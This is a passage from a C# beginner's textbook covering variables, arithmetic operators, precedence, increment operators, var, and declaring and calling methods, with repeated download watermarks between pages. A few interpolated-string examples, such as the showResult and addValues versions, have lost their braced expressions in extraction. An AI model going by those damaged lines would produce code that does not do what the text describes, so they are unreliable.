guess how the typeSelectionChanged method works; if not, Chapter 4,
“Using decision statements,” makes this code clear. At present, all you
need to understand is that when the user clicks an item in the ListBox
control, the details of the item are passed to this method, which then
uses this information to determine what happens next. For example, if
the user clicks the float value, this method calls another method named
showFloatValue.
5. Scroll down through the code and find the showFloatValue method,
Download from finelybook [email protected]
101
which looks like this:
Click here to view code image
private void showFloatValue()
{
float floatVar;
floatVar = 0.42F;
value.Text = floatVar.ToString();
}
The body of this method contains three statements. The first statement
declares a variable named floatVar of type float.
The second statement assigns floatVar the value 0.42F.
Important Remember that the F is a type suffix specifying that
0.42 should be treated as a float value. If you forget the F, the
value 0.42 is treated as a double, and your program will not
compile because you cannot assign a value of one type to a
variable of a different type without writing additional code. C# is
very strict in this respect.
The third statement displays the value of this variable in the value text
box on the form. This statement requires your attention. As is illustrated
in Chapter 1, the way you display an item in a text box is to set its Text
property (you did this by using XAML in Chapter 1). You can also
perform this task programmatically, which is what is going on here.
Notice that you access the property of an object by using the same dot
notation that you saw for running a method. (Remember
Console.WriteLine from Chapter 1?) Also, the data that you put in the
Text property must be a string and not a number. If you try to assign a
number to the Text property, your program will not compile.
Fortunately, the .NET Framework provides some help in the form of the
ToString method.
Every data type in the .NET Framework has a ToString method. The
Download from finelybook [email protected]
102
purpose of ToString is to convert an object to its string representation.
The showFloatValue method uses the ToString method of the float
variable floatVar object to generate a string version of the value of this
variable. You can then safely assign this string to the Text property of
the value text box. When you create your own data types and classes,
you can define your own implementation of the ToString method to
specify how your class should be represented as a string. You learn more
about creating your own classes in Chapter 7, “Creating and managing
classes and objects.”
6. In the Code and Text Editor window, locate the showIntValue method:
Click here to view code image
private void showIntValue()
{
value.Text = "to do";
}
The showIntValue method is called when you click the int type in the list
box.
7. At the start of the showIntValue method, on a new line after the opening
brace, type the following two statements shown in bold:
Click here to view code image
private void showIntValue()
{
int intVar;
intVar = 42;
value.Text = "to do";
}
The first statement creates a variable called intVar that can hold an int
value. The second statement assigns the value 42 to this variable.
8. In the original statement in this method, change the string “to do” to
intVar.ToString();
The method should now look exactly like this:
Click here to view code image
private void showIntValue()
{
int intVar;
Download from finelybook [email protected]
103
intVar = 42;
value.Text = intVar.ToString();
}
9. On the Debug menu, click Start Debugging.
The form appears again.
10. In the Choose A Data Type list, select the int type. Confirm that the
value 42 is displayed in the Sample Value text box.
11. Return to Visual Studio and then, on the Debug menu, click Stop
Debugging.
12. In the Code and Text Editor window, find the showDoubleValue
method.
13. Edit the showDoubleValue method exactly as shown in bold type in the
following code:
Click here to view code image
private void showDoubleValue()
{
double doubleVar;
doubleVar = 0.42;
value.Text = doubleVar.ToString();
}
This code is similar to the showIntValue method, except that it creates a
variable called doubleVar that holds double values and is assigned the
value 0.42.
14. In the Code and Text Editor window, locate the showBoolValue method.
15. Edit the showBoolValue method exactly as follows:
Click here to view code image
private void showBoolValue()
{
bool boolVar;
boolVar = false;
value.Text = boolVar.ToString();
}
Again, this code is similar to the previous examples, except that boolVar
can only hold a Boolean value, true or false. In this case, the value
Download from finelybook [email protected]
104
assigned is false.
16. On the Debug menu, click Start Debugging.
17. In the Choose A Data Type list, select the float, double, and bool types.
In each case, verify that the correct value is displayed in the Sample
Value text box.
18. Return to Visual Studio and then, on the Debug menu, click Stop
Debugging.
Using arithmetic operators
C# supports the regular arithmetic operations you learned in your childhood:
the plus sign (+) for addition, the minus sign (–) for subtraction, the asterisk
(*) for multiplication, and the forward slash (/) for division. The symbols +,
–, *, and / are called operators because they “operate” on values to create
new values. In the following example, the variable moneyPaidToConsultant
ends up holding the product of 750 (the daily rate) and 20 (the number of
days the consultant was employed):
Click here to view code image
long moneyPaidToConsultant;
moneyPaidToConsultant = 750 * 20;
Note The values on which an operator performs its function are called
operands. In the expression 750 * 20, the * is the operator, and 750 and
20 are the operands.
Operators and types
Not all operators apply to all data types. The operators that you can use on a
value depend on the value’s type. For example, you can use all the arithmetic
operators on values of type char, int, long, float, double, or decimal.
Download from finelybook [email protected]
105
However, except for the plus operator (+), you can’t use the arithmetic
operators on values of type string, and you cannot use any of them with
values of type bool. So, the following statement is not allowed because the
string type does not support the minus operator (subtracting one string from
another is meaningless):
Click here to view code image
// compile-time error
Console.WriteLine("Gillingham" - "Forest Green Rovers");
However, you can use the + operator to concatenate string values. You
need to be careful because this can have unexpected results. For example, the
following statement writes “431” (not “44”) to the console:
Click here to view code image
Console.WriteLine("43" + "1");
Tip The .NET Framework provides a method called Int32.Parse that
you can use to convert a string value to an integer if you need to
perform arithmetic computations on values held as strings.
String interpolation
A feature added recently to C# is string interpolation, which renders
many uses of the + operator obsolete for concatenating strings.
A common use of string concatenation is to generate string values
that include variable values. You saw an example of this in the
exercises in Chapter 1 that created a graphical application. In the
okClick method you added the following line of code:
Click here to view code image
MessageDialog msg = new MessageDialog("Hello " + userName.Text);
String interpolation lets you use the following syntax instead:
Download from finelybook [email protected]
106
Click here to view code image
MessageDialog msg = new MessageDialog($"Hello {userName.Text}");
The $ symbol at the start of the string indicates that it is an
interpolated string and that any expressions between the { and }
characters should be evaluated and the result substituted in their place.
Without the leading $ symbol, the string {username.Text} would be
treated literally.
String interpolation is more efficient than using the + operator; string
concatenation using the + operator can be memory hungry by virtue of
the way in which strings are handled by the .NET Framework. String
interpolation is also arguably more readable and less error-prone.
You should also be aware that the type of the result of an arithmetic
operation depends on the type of the operands used. For example, the value
of the expression 5.0/2.0 is 2.5; the type of both operands is double, so the
type of the result is also double. (Remember that in C#, literal numbers with
decimal points are always double, not float, to maintain as much accuracy as
possible.) However, the value of the expression 5/2 is 2. In this case, the type
of both operands is int, so the type of the result is also int. C# always rounds
toward zero in circumstances like this. The situation gets a little more
complicated if you mix the types of the operands. For example, the
expression 5/2.0 consists of an int and a double. The C# compiler detects the
mismatch and generates code that converts the int into a double before
performing the operation. The result of the operation is, therefore, a double
(2.5). However, although this works, it is considered poor practice to mix
types in this way.
C# also supports a less-familiar arithmetic operator: the remainder, or
modulus, operator, which is represented by the percent sign (%). The result of
x % y is the integer remainder after dividing the integer value x by the integer
value y. So, for example, 9 % 2 is 1 because 9 divided by 2 is 4, remainder 1.
Download from finelybook [email protected]
107
Note If you are familiar with C or C++, you know that you can’t use the
remainder operator on float or double values in these languages.
However, C# relaxes this rule. The remainder operator is valid with all
numeric types, and the result is not necessarily an integer. For example,
the result of the expression 7.0 % 2.4 is 2.2.
Numeric types and infinite values
There are one or two other features of numbers in C# about which you
should be aware. For example, the result of dividing any number by
zero is infinity, which is outside the range of the int, long, and decimal
types; consequently, evaluating an expression such as 5/0 results in
error. However, the double and float types actually have a special value
that can represent infinity, and the value of the expression 5.0/0.0 is
Infinity. The one exception to this rule is the value of the expression
0.0/0.0. Usually, if you divide zero by anything, the result is zero, but if
you divide anything by zero, the result is infinity. The expression
0.0/0.0 results in a paradox; the value must be zero and infinity at the
same time. C# has another special value for this situation called NaN,
which stands for “not a number.” So if you evaluate 0.0/0.0, the result is
NaN.
NaN and Infinity propagate through expressions. If you evaluate 10 +
NaN, the result is NaN, and if you evaluate 10 + Infinity, the result is
Infinity. The value of the expression Infinity * 0 is NaN.
Examining arithmetic operators
The following exercise demonstrates how to use the arithmetic operators on
int values.
Run the MathsOperators project
1. Start Visual Studio 2017 if it is not already running.
Download from finelybook [email protected]
108
2. Open the MathsOperators solution, located in the \Microsoft
Press\VCSBS\Chapter 2\ MathsOperators folder in your Documents
folder.
3. On the Debug menu, click Start Debugging.
The following form appears:
4. In the Left Operand box, type 54.
5. In the Right Operand box, type 13.
You can now apply any of the operators to the values in the text boxes.
6. Click the – Subtraction option, and then click Calculate.
The text in the Expression box changes to 54 – 13, but the value 0
appears in the Result box; this is clearly wrong.
7. Click the / Division option, and then click Calculate.
The text in the Expression box changes to 54/13, and again the value 0
appears in the Result box.
8. Click the % Remainder button, and then click Calculate.
The text in the Expression box changes to 54 % 13, but, once again, the
value 0 appears in the Result text box. Test other combinations of
numbers and operators; you will find that they all currently yield the
Download from finelybook [email protected]
109
value 0.
Note If you type a non-integer value into either of the operand
boxes, the application detects an error and displays the message
“Input string was not in a correct format.” You will learn more
about how to catch and handle errors and exceptions in Chapter 6,
“Managing errors and exceptions.”
9. When you have finished, return to Visual Studio and then, on the Debug
menu, click Stop Debugging.
As you might have guessed, none of the calculations are currently
implemented by the MathsOperators application. In the next exercise, you
will correct this.
Perform calculations in the MathsOperators application
1. Display the MainPage.xaml form in the Design View window. (In
Solution Explorer, in the MathsOperators project, double-click the file
MainPage.xaml.)
2. On the View menu, point to Other Windows, and then click Document
Outline.
The Document Outline window appears, showing the names and types
of the controls on the form. The Document Outline window provides a
simple way to locate and select controls on a complex form. The
controls are arranged in a hierarchy, starting with the Page that
constitutes the form. As mentioned in Chapter 1, a Universal Windows
Platform (UWP) app page contains a Grid control, and the other controls
are placed within this Grid. If you expand the Grid node in the
Document Outline window, the other controls appear, starting with
another Grid (the outer Grid acts as a frame, and the inner Grid contains
the controls that you see on the form). If you expand the inner Grid, you
can see each of the controls on the form.
Download from finelybook [email protected]
110
If you click any of these controls, the corresponding element is
highlighted in the Design View window. Similarly, if you select a
control in the Design View window, the corresponding control is
selected in the Document Outline window. (To see this in action, pin the
Document Outline window in place by deselecting the Auto Hide button
in the upper-right corner of the Document Outline window.)
3. On the form, click the two TextBox controls into which the user types
numbers. In the Document Outline window, verify that they are named
lhsOperand and rhsOperand.
When the form runs, the Text property of each of these controls holds
the values that the user enters.
4. Toward the bottom of the form, verify that the TextBlock control used to
display the expression being evaluated is named expression and that the
TextBlock control used to display the result of the calculation is named
result.
5. Close the Document Outline window.
Download from finelybook [email protected]
111
6. On the View menu, click Code to display the code for the
MainPage.xaml.cs file in the Code and Text Editor window.
7. In the Code and Text Editor window, locate the addValues method. It
looks like this:
Click here to view code image
private void addValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Add rhs to lhs and store the result in outcome
expression.Text = $"{lhsOperand.Text} + {rhsOperand.Text}";
result.Text = outcome.ToString();
}
The first statement in this method declares an int variable called lhs and
initializes it with the integer corresponding to the value typed by the
user in the lhsOperand box. Remember that the Text property of a
TextBox control contains a string, but lhs is an int, so you must convert
this string to an integer before you can assign it to lhs. The int data type
provides the int.Parse method, which does precisely this.
The second statement declares an int variable called rhs and initializes it
to the value in the rhsOperand box after converting it to an int.
The third statement declares an int variable called outcome.
A comment stating that you need to add rhs to lhs and store the result in
outcome follows. This is the missing bit of code that you need to
implement, which you will do in the next step.
The fifth statement uses string interpolation to construct a string that
indicates the calculation being performed and assigns the result to the
expression.Text property. This causes the string to appear in the
Expression box on the form.
The final statement displays the result of the calculation by assigning it
to the Text property of the Result box. Remember that the Text property
is a string, and the result of the calculation is an int, so you must convert
the int to a string before assigning it to the Text property. Recall that this
is what the ToString method of the int type does.
Download from finelybook [email protected]
112
8. Below the comment in the middle of the addValues method, add the
following statement (shown below in bold):
Click here to view code image
private void addValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Add rhs to lhs and store the result in outcome
outcome = lhs + rhs;
expression.Text = $"{lhsOperand.Text} + {rhsOperand.Text}";
result.Text = outcome.ToString();
}
This statement evaluates the expression lhs + rhs and stores the result in
outcome.
9. Examine the subtractValues method. You should see that it follows a
similar pattern. Here you need to add the statement to calculate the result
of subtracting rhs from lhs and store it in outcome. Add the following
statement (in bold) to this method:
Click here to view code image
private void subtractValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Subtract rhs from lhs and store the result in outcome
outcome = lhs - rhs;
expression.Text = $"{lhsOperand.Text} - {rhsOperand.Text}";
result.Text = outcome.ToString();
}
10. Examine the multiplyValues, divideValues, and remainderValues
methods. Again, they are all missing the crucial statement that performs
the specified calculation. Add the appropriate statements to these
methods (shown in bold).
Click here to view code image
private void multiplyValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
Download from finelybook [email protected]
113
// TODO: Multiply lhs by rhs and store the result in outcome
outcome = lhs * rhs;
expression.Text = $"{lhsOperand.Text} * {rhsOperand.Text}";
result.Text = outcome.ToString();
}
private void divideValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Divide lhs by rhs and store the result in outcome
outcome = lhs / rhs;
expression.Text = $"{lhsOperand.Text} / {rhsOperand.Text}";
result.Text = outcome.ToString();
}
private void remainderValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Work out the remainder after dividing lhs by rhs and
store the result in outcome
outcome = lhs % rhs;
expression.Text = $"{lhsOperand.Text} % {rhsOperand.Text}";
result.Text = outcome.ToString();
}
Test the MathsOperators application
1. On the Debug menu, click Start Debugging to build and run the
application.
2. Type 54 in the Left Operand box, type 13 in the Right Operand box,
click the + Addition option and then click Calculate.
3. The value 67 should appear in the Result box.
4. Click the – Subtraction option, and then click Calculate. Verify that the
result is now 41.
5. Click the * Multiplication option, and then click Calculate. Verify that
the result is now 702.
6. Click the / Division option, and then click Calculate. Verify that the
result is now 4.
Download from finelybook [email protected]
114
In real life, 54/13 is 4.153846 recurring, but this is not real life, this is
C# performing integer division. When you divide one integer by another
integer, the answer you get back is an integer, as explained earlier.
7. Click the % Remainder option, and then click Calculate. Verify that the
result is now 2.
When dealing with integers, the remainder after dividing 54 by 13 is 2;
(54 – ((54/13) * 13)) is 2. This is because the calculation rounds down to
an integer at each stage. (My high school math teacher would be
horrified to be told that (54/13) * 13 does not equal 54!)
8. Return to Visual Studio and stop debugging.
Controlling precedence
Precedence governs the order in which an expression’s operators are
evaluated. Consider the following expression, which uses the + and *
operators:
2 + 3 * 4
This expression is potentially ambiguous: Do you perform the addition
first or the multiplication? The order of the operations matters because it
changes the result:
If you perform the addition first, followed by the multiplication, the
result of the addition (2 + 3) forms the left operand of the * operator,
and the result of the whole expression is 5 * 4, which is 20.
If you perform the multiplication first, followed by the addition, the
result of the multiplication (3 * 4) forms the right operand of the +
operator, and the result of the whole expression is 2 + 12, which is 14.
In C#, the multiplicative operators (*, /, and %) have precedence over the
additive operators (+ and –), so in expressions such as 2 + 3 * 4, the
multiplication is performed first, followed by the addition. The answer to 2 +
3 * 4 is therefore 14.
You can use parentheses to override precedence and force operands to
bind to operators in a different way. For example, in the following
expression, the parentheses force the 2 and the 3 to bind to the + operator
Download from finelybook [email protected]
115
(making 5), and the result of this addition forms the left operand of the *
operator to produce the value 20:
(2 + 3) * 4
Note The term parentheses or round brackets refers to (). The term
braces or curly brackets refers to { }. The term square brackets refers to
[ ].
Using associativity to evaluate expressions
Operator precedence is only half the story. What happens when an expression
contains different operators that have the same precedence? This is where
associativity becomes important. Associativity is the direction (left or right)
in which the operands of an operator are evaluated. Consider the following
expression that uses the / and * operators:
4 / 2 * 6
At first glance, this expression is potentially ambiguous. Do you perform
the division first or the multiplication? The precedence of both operators is
the same (they are both multiplicatives), but the order in which the operators
in the expression are applied is important because you can get two different
results:
If you perform the division first, the result of the division (4/2) forms
the left operand of the * operator, and the result of the whole
expression is (4/2) * 6, or 12.
If you perform the multiplication first, the result of the multiplication
(2 * 6) forms the right operand of the / operator, and the result of the
whole expression is 4/(2 * 6), or 4/12.
In this case, the associativity of the operators determines how the
expression is evaluated. The * and / operators are both left associative, which
means that the operands are evaluated from left to right. In this case, 4/2 will
Download from finelybook [email protected]
116
be evaluated before multiplying by 6, giving the result 12.
Associativity and the assignment operator
In C#, the equal sign (=) is an operator. All operators return a value based on
their operands. The assignment operator = is no different. It takes two
operands: the operand on the right side is evaluated and then stored in the
operand on the left side. The value of the assignment operator is the value
that was assigned to the left operand. For example, in the following
assignment statement, the value returned by the assignment operator is 10,
which is also the value assigned to the variable myInt:
Click here to view code image
int myInt;
myInt = 10; // value of assignment expression is 10
At this point, you might be thinking that this is all very nice and esoteric,
but so what? Well, because the assignment operator returns a value, you can
use this same value with another occurrence of the assignment statement, like
this:
int myInt;
int myInt2;
myInt2 = myInt = 10;
The value assigned to the variable myInt2 is the value that was assigned to
myInt. The assignment statement assigns the same value to both variables.
This technique is useful if you want to initialize several variables to the same
value. It makes it very clear to anyone reading your code that all the variables
must have the same value:
Click here to view code image
myInt5 = myInt4 = myInt3 = myInt2 = myInt = 10;
From this discussion, you can probably deduce that the assignment
operator associates from right to left. The right-most assignment occurs first,
and the value assigned propagates through the variables from right to left. If
any of the variables previously had a value, it is overwritten by the value
being assigned.
You should treat this construct with caution, however. One frequent
Download from finelybook [email protected]
117
mistake that new C# programmers make is to try to combine this use of the
assignment operator with variable declarations. For example, you might
expect the following code to create and initialize three variables with the
same value (10):
Click here to view code image
int myInt, myInt2, myInt3 = 10;
This is legal C# code (because it compiles). What it does is declare the
variables myInt, myInt2, and myInt3 and initialize myInt3 with the value 10.
However, it does not initialize myInt or myInt2. If you try to use myInt or
myInt2 in an expression such as
myInt3 = myInt / myInt2;
the compiler generates the following errors:
Click here to view code image
Use of unassigned local variable 'myInt'
Use of unassigned local variable 'myInt2'
Incrementing and decrementing variables
If you want to add 1 to a variable, you can use the + operator, as
demonstrated here:
count = count + 1;
However, adding 1 to a variable is so common that C# provides its own
operator just for this purpose: the ++ operator. To increment the variable
count by 1, you can write the following statement:
count++;
Similarly, C# provides the -- operator that you can use to subtract 1 from a
variable, like this:
count--;
The ++ and -- operators are unary operators, meaning that they take only a
single operand. They share the same precedence and are both left associative.
Download from finelybook [email protected]
118
Prefix and postfix
The increment (++) and decrement (--) operators are unusual in that you can
place them either before or after the variable. Placing the operator symbol
before the variable is called the prefix form of the operator, and using the
operator symbol after the variable is called the postfix form. Here are
examples:
Click here to view code image
count++; // postfix increment
++count; // prefix increment
count--; // postfix decrement
--count; // prefix decrement
Whether you use the prefix or postfix form of the ++ or -- operator makes
no difference to the variable being incremented or decremented. For example,
if you write count++, the value of count increases by 1, and if you write
++count, the value of count also increases by 1. Knowing this, you’re
probably wondering why there are two ways to write the same thing. To
understand the answer, you must remember that ++ and -- are operators and
that all operators are used to evaluate an expression that has a value. The
value returned by count++ is the value of count before the increment takes
place, whereas the value returned by ++count is the value of count after the
increment takes place. Here is an example:
Click here to view code image
int x;
x = 42;
Console.WriteLine(x++); // x is now 43, 42 written out
x = 42;
Console.WriteLine(++x); // x is now 43, 43 written out
The way to remember which operand does what is to look at the order of
the elements (the operand and the operator) in a prefix or postfix expression.
In the expression x++, the variable x occurs first, so its value is used as the
value of the expression before x is incremented. In the expression ++x, the
operator occurs first, so its operation is performed before the value of x is
evaluated as the result.
These operators are most commonly used in while and do statements,
which are presented in Chapter 5, “Using compound assignment and iteration
statements.” If you are using the increment and decrement operators in
Download from finelybook [email protected]
119
isolation, stick to the postfix form and be consistent.
Declaring implicitly typed local variables
Earlier in this chapter, you saw that you declare a variable by specifying a
data type and an identifier, like this:
int myInt;
It was also mentioned that you should assign a value to a variable before
you attempt to use it. You can declare and initialize a variable in the same
statement, such as illustrated in the following:
int myInt = 99;
Or, you can even do it like this, assuming that myOtherInt is an initialized
integer variable:
int myInt = myOtherInt * 99;
Now, remember that the value you assign to a variable must be of the
same type as the variable. For example, you can assign an int value only to an
int variable. The C# compiler can quickly work out the type of an expression
used to initialize a variable and indicate whether it does not match the type of
the variable. You can also ask the C# compiler to infer the type of a variable
from an expression and use this type when declaring the variable by using the
var keyword in place of the type, as demonstrated here:
Click here to view code image
var myVariable = 99;
var myOtherVariable = "Hello";
The variables myVariable and myOtherVariable are referred to as
implicitly typed variables. The var keyword causes the compiler to deduce the
type of the variables from the types of the expressions used to initialize them.
In these examples, myVariable is an int, and myOtherVariable is a string.
However, it is important for you to understand that this is a convenience for
declaring variables only. After a variable has been declared, you can assign
only values of the inferred type to it. For example, you cannot assign float,
double, or string values to myVariable at a later point in your program. You
should also understand that you can use the var keyword only when you
Download from finelybook [email protected]
120
supply an expression to initialize a variable. The following declaration is
illegal and causes a compilation error:
Click here to view code image
var yetAnotherVariable; // Error - compiler cannot infer type
Important If you have programmed with Visual Basic in the past, you
might be familiar with the Variant type, which you can use to store any
type of value in a variable. I emphasize here and now that you should
forget everything you ever learned when programming with Visual
Basic about Variant variables. Although the keywords look similar, var
and Variant mean totally different things. When you declare a variable
in C# by using the var keyword, the type of values that you assign to the
variable cannot change from that used to initialize the variable.
If you are a purist, you are probably gritting your teeth at this point and
wondering why on earth the designers of a neat language such as C# should
allow a feature such as var to creep in. After all, it sounds like an excuse for
extreme laziness on the part of programmers and can make it more difficult to
understand what a program is doing or track down bugs (and it can even
easily introduce new bugs into your code). However, trust me that var has a
very valid place in C#, as you will see when you work through many of the
following chapters. However, for the time being, we will stick to using
explicitly typed variables except for when implicit typing becomes a
necessity.
Summary
In this chapter, you saw how to create and use variables and learned about
some of the common data types available for variables in C#. You also
learned about identifiers. Also, you used a number of operators to build
expressions, and you learned how the precedence and associativity of
operators determine how expressions are evaluated.
Download from finelybook [email protected]
121
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 3.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare a
variable
Write the name of the data type, followed by the name
of the variable, followed by a semicolon. For example:
int outcome;
Declare a
variable and give
it an initial value
Write the name of the data type, followed by the name
of the variable, followed by the assignment operator and
the initial value. Finish with a semicolon. For example:
int outcome = 99;
Change the value
of a variable
Write the name of the variable on the left, followed by
the assignment operator, followed by the expression
calculating the new value, followed by a semicolon. For
example:
outcome = 42;
Generate a string
representation of
the value in a
variable
Call the ToString method of the variable. For example:
int intVar = 42; string stringVar =
intVar.ToString();
Convert a string
to an int
Call the System.Int32.Parse method. For example:
string stringVar = "42"; int intVar
= System.Int32.Parse(stringVar);
Override the
precedence of an
operator
Use parentheses in the expression to force the order of
evaluation. For example:
Download from finelybook [email protected]
122
(3 + 4) * 5
Assign the same
value to several
variables
Use an assignment statement that lists all the variables.
For example:
myInt4 = myInt3 = myInt2 = myInt = 10;
Increment or
decrement a
variable
Use the ++ or -- operator. For example:
count++;
Download from finelybook [email protected]
123
CHAPTER 3
Writing methods and applying
scope
After completing this chapter, you will be able to:
Declare and call methods.
Pass information to a method.
Return information from a method.
Define local and class scope.
Use the integrated debugger to step into and out of methods as they
run.
In Chapter 2, “Working with variables, operators, and expressions,” you
learned how to declare variables, how to create expressions using operators,
and how precedence and associativity control the way in which expressions
containing multiple operators are evaluated. In this chapter, you’ll learn about
methods. You’ll see how to declare and call methods, how to use arguments
and parameters to pass information to a method, and how to return
information from a method by using a return statement. You’ll also see how
to step into and out of methods by using the Microsoft Visual Studio 2017
integrated debugger. This information is useful when you need to trace the
execution of your methods because they do not work quite as you expect.
Finally, you’ll learn how to declare methods that take optional parameters
and how to invoke methods by using named arguments.
Download from finelybook [email protected]
124
Creating methods
A method is a named sequence of statements. If you have previously
programmed by using a language such as C, C++, or Microsoft Visual Basic,
you will see that a method is similar to a function or a subroutine. A method
has a name and a body. The method name should be a meaningful identifier
that indicates the overall purpose of the method (calculateIncomeTax, for
example). The method body contains the actual statements to be run when the
method is called. Additionally, methods can be given some data for
processing and can return information, which is usually the result of the
processing. Methods are a fundamental and powerful mechanism.
Declaring a method
The syntax for declaring a C# method is as follows:
Click here to view code image
returnType methodName ( parameterList )
{
// method body statements go here
}
The following is a description of the elements that make up a declaration:
The returnType is the name of a type and specifies the kind of
information the method returns as a result of its processing. This can be
any type, such as int or string. If you’re writing a method that does not
return a value, you must use the keyword void in place of the return
type.
The methodName is the name used to call the method. Method names
follow the same identifier rules as variable names. For example,
addValues is a valid method name, whereas add$Values is not. For
now, you should follow the camelCase convention for method names;
for example, displayCustomer.
The parameterList is optional and describes the types and names of the
information that you can pass into the method for it to process. You
write the parameters between opening and closing parentheses, ( ), as
though you’re declaring variables, with the name of the type followed
by the name of the parameter. If the method you’re writing has two or
Download from finelybook [email protected]
125
more parameters, you must separate them with commas.
The method body statements are the lines of code that are run when the
method is called. They are enclosed between opening and closing
braces, { }.
Important If you program in C, C++, and Visual Basic, you should
note that C# does not support global methods. You must write all your
methods inside a class; otherwise, your code will not compile.
Here’s the definition of a method called addValues that returns an int
result and has two int parameters, leftHandSide and rightHandSide:
Click here to view code image
int addValues(int leftHandSide, int rightHandSide)
{
// ...
// method body statements go here
// ...
}
Note You must explicitly specify the types of any parameters and the
return type of a method. You cannot use the var keyword.
Here’s the definition of a method called showResult that does not return a
value and has a single int parameter called answer:
Click here to view code image
void showResult(int answer)
{
// ...
}
Notice the use of the keyword void to indicate that the method does not
Download from finelybook [email protected]
126
return anything.
Important If you’re familiar with Visual Basic, notice that C# does not
use different keywords to distinguish between a method that returns a
value (a function) and a method that does not return a value (a
procedure or subroutine). You must always specify either a return type
or void.
Returning data from a method
If you want a method to return information (that is, its return type is not
void), you must include a return statement at the end of the processing in the
method body. A return statement consists of the keyword return followed by
an expression that specifies the returned value and a semicolon. The type of
the expression must be the same as the type specified by the method
declaration. For example, if a method returns an int, the return statement
must return an int; otherwise, your program will not compile. Here is an
example of a method with a return statement:
Click here to view code image
int addValues(int leftHandSide, int rightHandSide)
{
// ...
return leftHandSide + rightHandSide;
}
The return statement is usually positioned at the end of the method
because it causes the method to finish, and control returns to the statement
that called the method, as described later in this chapter. Any statements that
occur after the return statement are not executed (although the compiler
warns you about this problem if you place statements after the return
statement).
If you don’t want your method to return information (that is, its return
type is void), you can use a variation of the return statement to cause an
immediate exit from the method. You write the keyword return and follow it
Download from finelybook [email protected]
127
immediately with a semicolon. For example:
Click here to view code image
void showResult(int answer)
{
// display the answer
Console.WriteLine($"The answer is ");
return;
}
If your method does not return anything, you can also omit the return
statement because the method finishes automatically when execution arrives
at the closing brace at the end of the method. Although this practice is
common, it is not always considered good style.
Using expression-bodied methods
Some methods can be very simple, performing a single task or returning the
results of a calculation without involving any additional logic. C# supports a
simplified form for methods that comprise a single expression. These
methods can still take parameters and return values, and they operate in the
same way as the methods that you have seen so far. The following code
examples show simplified versions of the addValues and showResult methods
written as expression-bodied methods:
Click here to view code image
int addValues(int leftHandSide, int rightHandSide) => leftHandSide +
rightHandSide;
void showResult(int answer) => Console.WriteLine($"The answer is ");
The main differences are the use of the => operator to reference the
expression that forms the body of the method and the absence of a return
statement. The value of the expression is used as the return value; if the
expression does not return a value, then the method is void.
There is actually no difference in functionality between using an ordinary
method and an expression-bodied method; an expression-bodied method is
merely a syntactic convenience. However, you will see examples later in the
book where expression-bodied methods can clarify a program by removing
lots of extraneous { and } characters, making the code easier to read.
In the following exercise, you will examine another version of the
Download from finelybook [email protected]
128
MathsOperators project from Chapter 2. This version has been improved by
the careful use of some small methods. Dividing code in this way helps to
make it easier to understand and more maintainable.
Examine method definitions
1. Start Visual Studio 2017, if it is not already running.
2. Open the Methods solution, which is in the \Microsoft
Press\VCSBS\Chapter 3\Methods folder in your Documents folder.
3. On the Debug menu, click Start Debugging.
4. Visual Studio 2017 builds and runs the application. It should look the
same as the application from Chapter 2. Refamiliarize yourself with the
application and how it works and then return to Visual Studio. On the
Debug menu, click Stop Debugging.
5. Display the code for MainPage.xaml.cs in the Code and Text Editor
window (in Solution Explorer, expand the MainPage.xaml file and then
double-click MainPage.xaml.cs).
6. In the Code and Text Editor window, locate the addValues method,
which looks like this:
Click here to view code image
private int addValues(int leftHandSide, int rightHandSide)
{
expression.Text = $" + ";
return leftHandSide + rightHandSide;
}
Note For the moment, don’t worry about the private keyword at
the start of the definition of this method; you will learn what this
keyword means in Chapter 7, “Creating and managing classes and
objects.”
The addValues method contains two statements. The first statement
Download from finelybook [email protected]
129
displays the calculation being performed in the expression box on the
form.
The second statement uses the int version of the + operator to add the
values of the leftHandSide and rightHandSide int variables, and then
returns the result of this operation. Remember that adding two int values
together creates another int value, so the return type of the addValues
method is int.
If you look at the methods subtractValues, multiplyValues, divideValues,
and remainderValues, you will see that they follow a similar pattern.
7. In the Code and Text Editor window, locate the showResult method,
which looks like this:
Click here to view code image
private void showResult(int answer) =>
result.Text = answer.ToString();
This is an expression-bodied method that displays a string representation
of the answer parameter in the result box. It does not return a value, so
the type of this method is void.
Tip There is no minimum length for a method. If a method helps to
avoid repetition and makes your program easier to understand, the
method is useful regardless of how small it is.
There is also no maximum length for a method, but usually, you
want to keep your method code small enough to get the job done. If
your method is more than one screen in length, consider breaking it into
smaller methods for readability.
Calling methods
Methods exist to be called! You call a method by name to ask it to perform
Download from finelybook [email protected]
130
its task. If the method requires information (as specified by its parameters),
you must supply the information requested. If the method returns information
(as specified by its return type), you should arrange to capture this
information somehow.
Specifying the method call syntax
The syntax of a C# method call is as follows:
Click here to view code image
result = methodName ( argumentList )
The following is a description of the elements that make up a method call:
The methodName must exactly match the name of the method you’re
calling. Remember, C# is a case-sensitive language.
The result = clause is optional. If specified, the variable identified by
result contains the value returned by the method. If the method is void
(that is, it does not return a value), you must omit the result = clause of
the statement. If you don’t specify the result = clause and the method
does return a value, the method runs, but the return value is discarded.
The argumentList supplies the information that the method accepts.
You must supply an argument for each parameter, and the value of
each argument must be compatible with the type of its corresponding
parameter. If the method you’re calling has two or more parameters,
you must separate the arguments with commas.
Important You must include the parentheses in every method call,
even when calling a method that has no arguments.
To clarify these points, take a look at the addValues method again:
Click here to view code image
int addValues(int leftHandSide, int rightHandSide)
{
Download from finelybook [email protected]
131
// ...
}
The addValues method has two int parameters, so you must call it with
two comma-separated int arguments, such as this:
addValues(39, 3); // okay
You can also replace the literal values 39 and 3 with the names of int
variables. The values in those variables are then passed to the method as its
arguments, like this:
int arg1 = 99;
int arg2 = 1;
addValues(arg1, arg2);
